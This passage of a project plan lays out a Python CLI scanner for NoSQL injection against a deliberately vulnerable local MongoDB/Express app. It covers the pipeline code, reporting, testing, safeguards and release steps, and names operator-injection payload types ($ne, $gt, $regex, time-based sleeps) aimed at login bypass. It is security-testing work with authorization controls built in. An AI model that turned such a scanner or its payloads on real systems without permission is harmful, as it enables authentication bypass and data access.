      "high": 2,
      "medium": 1,
      "low": 0,
      "info": 0
    }
  },
  "findings": [ ... ]
}
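
As a sketch of how the report object above might be assembled, the function below derives `scan_duration_seconds` and the `by_severity` counts from raw scan data. The key names mirror the sample shown here; README.md remains the authoritative contract. Taking findings as plain dicts and the function name `build_report` are assumptions for illustration.

```python
from collections import Counter
from datetime import datetime

SEVERITIES = ("critical", "high", "medium", "low", "info")


def _parse_iso(ts: str) -> datetime:
    # datetime.fromisoformat() only accepts a trailing "Z" from Python 3.11 on,
    # so it is rewritten as an explicit UTC offset first.
    return datetime.fromisoformat(ts.replace("Z", "+00:00"))


def build_report(target: str, scan_start: str, scan_end: str,
                 pages_crawled: int, forms_tested: int, payloads_tested: int,
                 findings: list[dict]) -> dict:
    """Assemble a JSON-serializable report dict from scan totals and findings."""
    counts = Counter(f["severity"] for f in findings)
    duration = _parse_iso(scan_end) - _parse_iso(scan_start)
    return {
        "target": target,
        "scan_time": scan_start,
        "scan_duration_seconds": round(duration.total_seconds()),
        "summary": {
            "pages_crawled": pages_crawled,
            "forms_tested": forms_tested,
            "payloads_tested": payloads_tested,
            "potential_findings": len(findings),
            # Every severity level is present, even when its count is zero.
            "by_severity": {level: counts.get(level, 0) for level in SEVERITIES},
        },
        "findings": findings,
    }
```

The result can be written with `json.dump(report, fh, indent=2)`.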

print_console_summary(scan_result: ScanResult) — uses rich to display:
- Header banner with scan metadata
- Summary statistics table
- Findings table with columns: Severity, Endpoint, Payload Category, Evidence, Confidence
- Color-coded severity (Critical=red bold, High=orange, Medium=yellow, Low=cyan, Info=dim), consistent with the UX/DX success criteria in Section 3
- Footer with report file path

Verbose output mode: When --verbose is active, print each request/response pair as it happens (method, URL, content-type, payload, status code, response time, first 200 chars of body).

Deliverables:

core/reporter.py — JSON file writer + Rich console table
Verbose request/response logging

Exit Criteria:

JSON report validates against the contract schema
Console output is readable, color-coded, and includes all findings
Verbose mode logs every request/response pair with timing

References: R1, R6

Phase 7 — CLI Entry Point and Pipeline Integration

Goals: Wire everything together in scanner.py and implement the full scan pipeline.

Work Packages:

Implement scanner.py — Full argument parser and orchestration:
```
usage: scanner.py [-h] --url URL [--max-depth N] [--timeout SECS]
                  [--delay SECS] [--output FILE] [--verbose]
                  [--content-type {both,urlencoded,json}]
                  [--endpoints ENDPOINT [ENDPOINT ...]]
                  [--categories CATEGORY [CATEGORY ...]]
```
Arguments:
- --url (required): Target base URL
- --max-depth (default: 2): Crawl depth limit
- --timeout (default: 5): Per-request timeout in seconds
- --delay (default: 0.1): Delay between injection requests in seconds
- --output (default: report.json): Output report file path
- --verbose / -v: Enable verbose request/response logging
- --content-type (default: both): Which content types to test (both, urlencoded, json)
- --endpoints: Manual endpoint override — skip crawling and inject directly into these endpoints (e.g., POST:/api/vuln/login:username,password)
- --categories: Filter payload categories (e.g., operator_injection time_based)
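
The argument list above maps onto `argparse` fairly directly. The sketch below is one way to declare it; the help strings and the split into `build_parser` / `parse_args` are illustrative choices. On invalid input, `argparse` prints usage and exits with status 2 on its own, which matches the planned exit code for argument errors.

```python
import argparse
from typing import Optional, Sequence


def build_parser() -> argparse.ArgumentParser:
    parser = argparse.ArgumentParser(
        prog="scanner.py",
        description="NoSQL injection scanner for MongoDB-backed web applications",
    )
    parser.add_argument("--url", required=True, help="Target base URL")
    parser.add_argument("--max-depth", type=int, default=2, metavar="N",
                        help="Crawl depth limit")
    parser.add_argument("--timeout", type=int, default=5, metavar="SECS",
                        help="Per-request timeout in seconds")
    parser.add_argument("--delay", type=float, default=0.1, metavar="SECS",
                        help="Delay between injection requests in seconds")
    parser.add_argument("--output", default="report.json", metavar="FILE",
                        help="Output report file path")
    parser.add_argument("-v", "--verbose", action="store_true",
                        help="Log every request/response pair")
    parser.add_argument("--content-type", choices=("both", "urlencoded", "json"),
                        default="both", help="Content types to test")
    parser.add_argument("--endpoints", nargs="+", metavar="ENDPOINT",
                        help="Skip crawling; e.g. POST:/api/vuln/login:username,password")
    parser.add_argument("--categories", nargs="+", metavar="CATEGORY",
                        help="Restrict payload categories")
    return parser


def parse_args(argv: Optional[Sequence[str]] = None) -> argparse.Namespace:
    # argv=None makes argparse read sys.argv[1:]
    return build_parser().parse_args(argv)
```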

Scan pipeline in main():

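import sys
from datetime import datetime, timezone

import requests

from core.analyzer import ResponseAnalyzer
from core.crawler import Crawler
from core.form_parser import parse_forms
from core.injector import Injector
from core.models import ScanResult
from core.payloads import get_all_payloads, load_payloads
from core.reporter import generate_json_report, print_console_summary
from core.utils import print_banner, setup_logging
from core.validator import check_reachability, validate_url
# parse_args, parse_manual_endpoints, and deduplicate_findings are not yet
# assigned to a module in this plan; define them in scanner.py or import them.


def main():
    args = parse_args()
    logger = setup_logging(args.verbose)
    print_banner()
    start_time = datetime.now(timezone.utc).isoformat()

    # Step 1: Validate
    base_url = validate_url(args.url)
    reachable, status, rtt = check_reachability(base_url, args.timeout)
    if not reachable:
        logger.error(f"Target unreachable: {base_url}")
        sys.exit(1)

    # Step 2: Load payloads
    payloads = load_payloads("payloads.json")
    if args.categories:
        payloads = {k: v for k, v in payloads.items() if k in args.categories}

    # Step 3: Discover forms
    session = requests.Session()
    pages = []  # stays empty when --endpoints skips crawling
    if args.endpoints:
        forms = parse_manual_endpoints(args.endpoints)
    else:
        crawler = Crawler(base_url, args.max_depth, args.timeout, session)
        pages = crawler.crawl()
        forms = []
        for page in pages:
            forms.extend(parse_forms(page.html, page.url))

    # Step 4: Inject and analyze
    injector = Injector(session, args.timeout, args.delay, args.verbose)
    analyzer_findings = []
    all_payloads = get_all_payloads(payloads)
    total_injections = 0

    for form in forms:
        baseline = injector.establish_baseline(form)
        results = injector.inject_form(form, all_payloads)
        total_injections += len(results)  # one result per request sent
        response_analyzer = ResponseAnalyzer(baseline)
        for result in results:
            finding = response_analyzer.analyze(result)
            if finding:
                analyzer_findings.append(finding)

    # Step 5: Report
    scan_result = ScanResult(
        target=base_url,
        scan_start=start_time,
        scan_end=datetime.now(timezone.utc).isoformat(),
        pages_crawled=len(pages),
        forms_discovered=len(forms),
        payloads_tested=total_injections,
        findings=deduplicate_findings(analyzer_findings)
    )
    generate_json_report(scan_result, args.output)
    print_console_summary(scan_result)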

Error handling wrapper: Wrap the entire pipeline in try/except. Handle KeyboardInterrupt (print partial results), ConnectionError (retry once then fail), and unexpected errors (log traceback, exit 1).
Exit codes: 0 = success (scan completed, findings or not), 1 = scan error (unreachable target, etc.), 2 = argument error (the status argparse already uses when argument parsing fails).
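One way to structure the wrapper and exit codes described above is sketched below. The `run_pipeline` function and its parameters are hypothetical. The built-in `ConnectionError` stands in for `requests.exceptions.ConnectionError`, which the real scanner would pass as `retryable`. Returning 1 after a keyboard interrupt is an assumption, since the plan only defines codes 0, 1, and 2.

```python
import sys
import traceback
from typing import Callable

EXIT_OK = 0
EXIT_SCAN_ERROR = 1


def run_pipeline(
    pipeline: Callable[[], None],
    retryable: tuple[type[BaseException], ...] = (ConnectionError,),
    on_interrupt: Callable[[], None] = lambda: None,
) -> int:
    """Run the scan pipeline and map its outcome to a process exit code."""
    attempts = 2  # the first try plus a single retry
    for attempt in range(1, attempts + 1):
        try:
            pipeline()
            return EXIT_OK
        except KeyboardInterrupt:
            # Give the caller a chance to print partial results.
            on_interrupt()
            return EXIT_SCAN_ERROR  # assumption: interrupted scans exit 1
        except retryable as exc:
            if attempt == attempts:
                print(f"Connection failed after retry: {exc}", file=sys.stderr)
                return EXIT_SCAN_ERROR
        except Exception:
            # Unexpected error: log the traceback and fail.
            traceback.print_exc()
            return EXIT_SCAN_ERROR
    return EXIT_SCAN_ERROR
```

A caller would typically end with `sys.exit(run_pipeline(main))`. Exit code 2 needs no handling here because argparse exits with it before the pipeline starts.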

Deliverables:

- Complete scanner.py with argument parsing and pipeline orchestration
- Manual endpoint mode (`--endpoints`)
- Error handling and exit codes

Exit Criteria:

- `python scanner.py --help` prints full usage
- `python scanner.py --url http://localhost:3000 --output report.json` completes a full scan and produces a valid report
- `python scanner.py --url http://localhost:3000 --endpoints "POST:/api/vuln/login:username,password" --verbose` scans only the login endpoint
- Scanner exits with code 2 on bad arguments, code 1 on connection failure

References: R1, R4

Phase 8 — Testing and Validation

Goals: Validate the scanner produces correct results against both vulnerable and secure flows.

Work Packages:

- Validate against vulnerable flow:
  - Run full scan against http://localhost:3000 (vulnerable mode endpoints)
  - Confirm the report contains:
    - At least one critical finding for auth bypass on /api/vuln/login
    - At least one high finding for search injection on /api/vuln/search
  - Verify that the triggering payloads include the $ne, $gt, and $regex operator injections
  - Verify evidence descriptions are clear and actionable
- Validate against secure flow:
  - Run scan with `--endpoints "POST:/api/secure/login:username,password" "POST:/api/secure/search:query"`
  - Confirm the report contains zero findings (secure endpoints reject all operator payloads with 400)
  - Verify no false positives from timing noise or status code coincidences
- Edge case testing:
  - Test against unreachable URL → clean error message, exit code 1
  - Test with `--timeout 0.001` → timeout handling works gracefully
  - Test with empty payloads.json → scanner reports no payloads to test
  - Test with `--max-depth 0` → scanner tests only the root page
  - Test with malformed HTML target → parser handles gracefully
- Performance validation:
  - Full scan completes in under 60 seconds
  - Memory usage stays under 100MB
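The vulnerable-flow expectations above could be checked mechanically against a loaded report. The sketch below is illustrative only. It assumes the report is a dict with a `findings` list whose entries carry `severity` and `endpoint` keys, and those key names are assumptions, not a confirmed report schema.

```python
def check_vulnerable_report(report: dict) -> list[str]:
    """Return unmet expectations; an empty list means the report passes."""
    # (severity, endpoint) pairs taken from the vulnerable-flow checklist.
    expectations = [
        ("critical", "/api/vuln/login"),
        ("high", "/api/vuln/search"),
    ]
    findings = report.get("findings", [])
    problems = []
    for severity, endpoint in expectations:
        matched = any(
            f.get("severity") == severity and f.get("endpoint") == endpoint
            for f in findings
        )
        if not matched:
            problems.append(f"missing {severity} finding for {endpoint}")
    return problems
```

For the secure flow, the equivalent check is simply that `report.get("findings", [])` is empty.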

Deliverables:

- Validated scan reports for both vulnerable and secure flows
- Edge case test results documented
- Performance benchmarks recorded

Exit Criteria:

- Zero false negatives against the vulnerable flow (all known vulnerabilities detected)
- Zero false positives against the secure flow
- All edge cases handled gracefully without crashes

References: R1, R2, R5

Phase 9 — Packaging, Documentation, and Release Readiness

Goals: Polish the tool for release, finalize documentation, and ensure reproducible builds.

Work Packages:

- Finalize requirements.txt with exact pinned versions from the working venv (`pip freeze`)
- Update README.md with:
  - Installation instructions (venv setup, pip install)
  - Complete usage examples (basic scan, verbose mode, manual endpoints, category filtering)
  - Report output description with annotated example
  - Troubleshooting section (common errors and solutions)
- Add inline docstrings to all public functions and classes
- Add `--version` flag to the CLI
- Verify clean install: delete venv, recreate, install deps, run scan; everything works from scratch
- Create example reports: Include a sample example_report.json in the repo showing expected output

Deliverables:

- Pinned requirements.txt
- Updated README.md with full documentation
- All modules documented with docstrings
- Example report file
- Clean install verified

Exit Criteria:

- `pip install -r requirements.txt && python scanner.py --help` works from a fresh venv
- README covers all CLI options and includes worked examples
- Example report demonstrates the output format

References: R1, R6

6. Security Plan (Cross-Cutting)

6.1 Threat Model Checklist

- Accidental scanning of production systems: user mistypes URL or forgets scope restrictions; could trigger WAF alerts or legal issues
- Credential leakage in reports: session cookies or leaked credentials from successful bypasses appear in JSON reports
- Payload self-injection: if scanner processes its own output or error messages contain payloads, could cause confusion
- Dependency supply chain: compromised PyPI packages in the dependency chain
- Excessive resource consumption: unbounded crawling or aggressive request rates could DoS the target

6.2 Mandatory Controls

- Legal disclaimer: Scanner prints a warning on startup: "This tool should only be used on systems you own or have explicit authorization to test."
- Localhost default scope: When targeting non-localhost origins, require explicit `--confirm-external` flag
- Report sanitization: Truncate response bodies in reports to 500 characters; strip Set-Cookie headers from stored responses
- Dependency pinning: All dependencies pinned to specific versions in requirements.txt
- Request rate limiting: Default 100ms delay between requests (`--delay` flag), with minimum floor of 50ms
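Three of the controls above (localhost scope, report sanitization, and the delay floor) reduce to small pure functions. The following is a minimal sketch under stated assumptions: the function names are hypothetical, and the set of hosts treated as "localhost" is an assumption, since the plan does not enumerate it.

```python
from urllib.parse import urlsplit

# Assumption: these hostnames count as "localhost" for scope purposes.
LOCAL_HOSTS = {"localhost", "127.0.0.1", "::1"}
MIN_DELAY_SECONDS = 0.05   # 50ms floor from the rate-limiting control
MAX_BODY_CHARS = 500       # truncation limit from the sanitization control


def needs_external_confirmation(url: str) -> bool:
    """True when the target is not local and --confirm-external is required."""
    host = urlsplit(url).hostname or ""
    return host.lower() not in LOCAL_HOSTS


def effective_delay(requested: float) -> float:
    """Clamp the user-supplied --delay to the minimum floor."""
    return max(requested, MIN_DELAY_SECONDS)


def sanitize_response(
    headers: dict[str, str], body: str
) -> tuple[dict[str, str], str]:
    """Drop Set-Cookie headers and truncate the body before storing it."""
    safe_headers = {
        name: value
        for name, value in headers.items()
        if name.lower() != "set-cookie"
    }
    return safe_headers, body[:MAX_BODY_CHARS]
```

Keeping these as side-effect-free helpers makes each control easy to unit test independently of the HTTP layer.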

6.3 Security Testing Controls

- Run `pip-audit` or `safety check` against installed dependencies before release
- Manual review of all payloads in payloads.json to ensure they are detection-only (no destructive operations like db.dropDatabase())
- Verify scanner does not follow redirects to external domains during crawling
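The redirect check in the last item can be illustrated with a small scope test. This sketch assumes the crawler issues requests with `allow_redirects=False` and inspects the `Location` header itself; the `redirect_stays_in_scope` name is hypothetical, and comparing on host and port is one possible definition of "external".

```python
from urllib.parse import urljoin, urlsplit


def redirect_stays_in_scope(base_url: str, current_url: str, location: str) -> bool:
    """Decide whether a redirect target is on the same host:port as the scan target."""
    # Location may be relative, so resolve it against the page that sent it.
    target = urljoin(current_url, location)
    return urlsplit(target).netloc.lower() == urlsplit(base_url).netloc.lower()
```

A crawler using this check would follow the redirect only when the function returns `True` and would otherwise log and skip the target.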

7. Performance Plan (Cross-Cutting)

7.1 Key Levers

- Request timeout: controls how long each injection attempt waits; directly impacts total scan time
- Inter-request delay: prevents overwhelming the target; trades scan speed for target stability
- Crawl depth: limits the number of pages discovered; deeper crawls find more forms but take longer
- Payload count: more payloads = more thorough coverage but longer scans
- Content-type testing: testing both urlencoded and JSON doubles the request count
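The levers above multiply together, which a rough estimate makes concrete. The sketch below is back-of-envelope arithmetic, not the scanner's accounting: it assumes one request per form field, payload, and content type, ignores baseline and crawl requests, and uses hypothetical function names.

```python
def estimate_requests(
    forms: int, fields_per_form: int, payloads: int, content_types: int = 2
) -> int:
    """Injection requests: every payload hits every field in every content type."""
    return forms * fields_per_form * payloads * content_types


def estimate_duration_bounds(
    total_requests: int, delay: float = 0.1, timeout: float = 5.0
) -> tuple[float, float]:
    """Return (best case, worst case) scan time in seconds.

    Best case: responses are instant and only the inter-request delay counts.
    Worst case: every request runs into the full timeout.
    """
    best = total_requests * delay
    worst = total_requests * (delay + timeout)
    return best, worst


# Example: 2 forms, 2 fields each, 30 payloads, both content types.
total = estimate_requests(forms=2, fields_per_form=2, payloads=30)
best, worst = estimate_duration_bounds(total)
print(f"{total} requests, between {best:.0f}s and {worst:.0f}s")
```

With these example numbers the delay alone accounts for roughly 24 seconds across 240 requests, which shows how quickly the payload count eats into a fixed time budget.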

7.2 Recommended Defaults

| Setting | Default | Rationale |
| --- | --- | --- |
| `--timeout` | 5s | Sufficient for localhost; prevents hanging on unresponsive endpoints |
| `--delay` | 0.1s | 100ms is respectful to target while keeping scan time reasonable |
| `--max-depth` | 2 | Captures most forms without deep-crawling large sites |
| `--content-type` | `both` | Maximizes detection coverage; necessary since Express handles both formats |
| Time-based threshold | 2500ms | Sleep payloads use 3000ms; 2500ms threshold accounts for network jitter |

7.3 Runtime Safeguards

- Per-request timeout: Hard timeout of `--timeout` seconds on every HTTP request; requests.Timeout caught and logged
- Max pages cap: Crawler stops after 50 pages regardless of depth (prevents infinite crawling on large sites)
- Max payloads per form: Warn if more than 100 payloads are being tested per form (likely misconfiguration)
- Response body cap: Read at most 1MB of response body per request (prevents memory issues on large responses)
- Graceful degradation: If a form fails baseline capture (e.g., requires auth), skip it with a warning instead of aborting the entire scan
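The response body cap can be enforced by reading the body in chunks and stopping at the limit. The sketch below works on any iterable of byte chunks; with `requests`, such an iterable would come from a request made with `stream=True` followed by `response.iter_content(chunk_size=8192)`. The `read_capped` helper is hypothetical.

```python
from typing import Iterable

MAX_BODY_BYTES = 1024 * 1024  # 1MB cap from the runtime safeguards


def read_capped(chunks: Iterable[bytes], limit: int = MAX_BODY_BYTES) -> bytes:
    """Accumulate chunks until the limit is reached, then stop reading."""
    buf = bytearray()
    for chunk in chunks:
        remaining = limit - len(buf)
        buf.extend(chunk[:remaining])
        if len(buf) >= limit:
            # Stop pulling data so an oversized body is never fully downloaded.
            break
    return bytes(buf)
```

Because the loop breaks as soon as the cap is hit, a multi-gigabyte response costs at most `limit` bytes of memory plus one chunk.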

8. Configuration Surface

8.1 Non-Secret Settings

| Key | Type | Default | Description |
| --- | --- | --- | --- |
| `--url` | string | (required) | Target base URL |
| `--max-depth` | int | 2 | Maximum crawl depth |
| `--timeout` | float | 5.0 | Per-request timeout (seconds) |
| `--delay` | float | 0.1 | Inter-request delay (seconds) |
| `--output` | string | `report.json` | Output report file path |
| `--verbose` | bool | false | Enable detailed request/response logging |
| `--content-type` | enum | `both` | Content types to test: `both`, `urlencoded`, `json` |
| `--endpoints` | list[str] | [] | Manual endpoint specifications (skip crawling) |
| `--categories` | list[str] | all | Payload categories to use |

8.2 Secret / Credential Storage

No secrets are required by the scanner itself. If the target requires authentication before scanning protected endpoints, the user should:

- Use `--endpoints` mode with manually specified endpoints
- Or pre-authenticate via browser and export cookies to a file (future V2 feature)

No credential storage mechanism is needed for V1.

9. CI/CD and Governance Plan

Pull Requests / Merges

- All code changes via pull request to main
- PR checks:
  - Python syntax validation (`python -m py_compile` on all .py files)
  - `pip install -r requirements.txt` succeeds
  - Basic smoke test: `python scanner.py --help` exits 0

Release Candidates

- Full integration test against the vulnerable target app
- Dependency audit (`pip-audit`)
- Clean install test from fresh venv
- Report output validation against schema

Branch and Review Policy

- main branch is protected
- Feature branches named feature/<description>
- At least one reviewer approval required before merge
- Squash merges preferred for clean history

10. Risks and Mitigations

Risk 1 (Technical) — The target app's forms use JavaScript-based submission (fetch API), so standard HTML form parsing may miss the actual API endpoints. Mitigation — Implement --endpoints manual override mode; additionally, add JS file scanning to extract fetch/XHR URLs as a best-effort enhancement.

Risk 2 (Security) — A user accidentally runs the scanner against a production system they don't own, causing legal liability. Mitigation — Print mandatory legal disclaimer on startup; require --confirm-external flag for non-localhost targets.

Risk 3 (Operational) — The target app's session management (cookie-based) may cause false positives if a bypass payload sets a session that affects subsequent requests. Mitigation — Reset session (clear cookies) between payload groups; establish fresh baseline before each form's injection round.

Risk 4 (UX/Adoption) — False positives erode user trust and make the tool unreliable for real assessments. Mitigation — Multi-factor heuristic scoring (require both status code change AND body content indicator for "confirmed" confidence); clear confidence labels (confirmed/tentative/speculative) in reports.
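The multi-factor scoring in Risk 4 could map signals to confidence labels roughly as follows. Only the "confirmed" rule (status code change AND body content indicator) comes from the plan; the rules for "tentative" and "speculative" are assumptions made for illustration, as is the `confidence_label` name.

```python
from typing import Optional


def confidence_label(
    status_changed: bool, body_indicator: bool, timing_anomaly: bool = False
) -> Optional[str]:
    """Map observed signals to a confidence label, or None for no finding."""
    if status_changed and body_indicator:
        return "confirmed"    # both independent signals agree
    if status_changed or body_indicator:
        return "tentative"    # assumption: a single strong signal
    if timing_anomaly:
        return "speculative"  # assumption: timing alone is weak evidence
    return None
```

Requiring two independent signals for the top label is what keeps a coincidental status code change from being reported as a confirmed bypass.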

Risk 5 (Technical) — Time-based blind detection is inherently noisy: network latency can cause false positives and false negatives. Mitigation — Use a conservative threshold below the injected delay (the 2500ms default for 3000ms sleep payloads, roughly 0.8× the payload delay); run time-based payloads last; recommend local-network testing for reliable timing results.
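A timing check consistent with the 2500ms threshold might look like the sketch below. Comparing the added latency against a median of several baseline samples is an assumption made here to dampen jitter; the plan does not specify how the baseline timing is taken, and both function names are hypothetical.

```python
from statistics import median

TIME_THRESHOLD_MS = 2500.0  # default threshold for 3000ms sleep payloads


def baseline_latency_ms(samples_ms: list[float]) -> float:
    """Summarize several benign request timings; the median resists outliers."""
    return median(samples_ms)


def is_time_based_hit(
    elapsed_ms: float, baseline_ms: float, threshold_ms: float = TIME_THRESHOLD_MS
) -> bool:
    """Flag a response whose extra latency over the baseline meets the threshold."""
    return (elapsed_ms - baseline_ms) >= threshold_ms
```

Subtracting the baseline means a target that is slow for every request does not trigger a finding merely because its normal latency is high.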

11. Milestone Timeline

| Week | Phases | Description |
| --- | --- | --- |
| Week 1 | Phase 0 + Phase 1 | Environment setup, models, payloads, utilities |
| Week 2 | Phase 2 + Phase 3 | URL validation, crawler, form parser |
| Week 3 | Phase 4 | Injection engine with dual content-type support |
| Week 4 | Phase 5 + Phase 6 | Response analyzer, severity scoring, report generation |
| Week 5 | Phase 7 | CLI entry point, pipeline integration |
| Week 6 | Phase 8 + Phase 9 | Testing, validation, documentation, release |

12. Definition of Done (Project)

13. Reference Index

| ID | Title | Location |
| --- | --- | --- |
| R1 | Project README — CLI Scanner | README.md |
| R2 | NoSQL Injection Reference Guide | NoSQL Injection.md |
| R3 | NoSQL Injection Wordlist | nosqli_worlist.txt |
| R4 | Vulnerable Target — Server Config | server.js |
| R5 | Mode Auth Flow Test Results | MODE_AUTH_FLOW_TEST_RESULTS.md |
| R6 | Project Tasks Checklist | TASKS.md |
| R7 | NoSQL Testing Guide | NOSQLI_TESTING_GUIDE.md |
| R8 | Vulnerable Auth Controller | vulnAuth.js |
| R9 | Vulnerable Search Controller | vulnSearch.js |
| R10 | Vulnerable Routes | vulnRoutes.js |

14. Immediate Next Execution Steps

- Create the cli/core/ package: `mkdir cli/core && touch cli/core/__init__.py` to establish the module structure.
- Write core/models.py: Define all dataclasses (FormTarget, Payload, Finding, ScanResult, BaselineResponse, InjectionResult). This is the zero-dependency starting point that all other modules import.
- Populate payloads.json: Curate the full payload catalog from the wordlist and reference guide. Validate it loads correctly with json.load().
- Write core/utils.py: Implement logging setup, URL helpers, and all constant lists (error signatures, success/failure indicators). Import and test from a REPL.
- Write requirements.txt: Add requests>=2.32, beautifulsoup4>=4.12, rich>=13.0, urllib3>=2.0 as initial minimum versions and run `pip install -r requirements.txt` to confirm clean installation. These ranges are replaced by exact pins from `pip freeze` in Phase 9.
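As a starting point for core/models.py, two of the dataclasses might be sketched as below. The `ScanResult` fields mirror the keyword arguments used in the Phase 7 pipeline; the `Finding` fields and the `to_json` helper are assumptions for illustration, not the project's confirmed schema.

```python
import json
from dataclasses import asdict, dataclass, field


@dataclass
class Finding:
    """One reported issue. Field names here are illustrative assumptions."""
    endpoint: str
    payload: str
    severity: str
    confidence: str
    evidence: str


@dataclass
class ScanResult:
    """Scan summary; fields follow the ScanResult(...) call in main()."""
    target: str
    scan_start: str
    scan_end: str
    pages_crawled: int
    forms_discovered: int
    payloads_tested: int
    findings: list[Finding] = field(default_factory=list)


def to_json(result: ScanResult) -> str:
    """Serialize a scan result; asdict() also converts the nested findings."""
    return json.dumps(asdict(result), indent=2)
```

Using only the standard library keeps this module free of third-party dependencies, in line with its role as the import root for the other modules.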
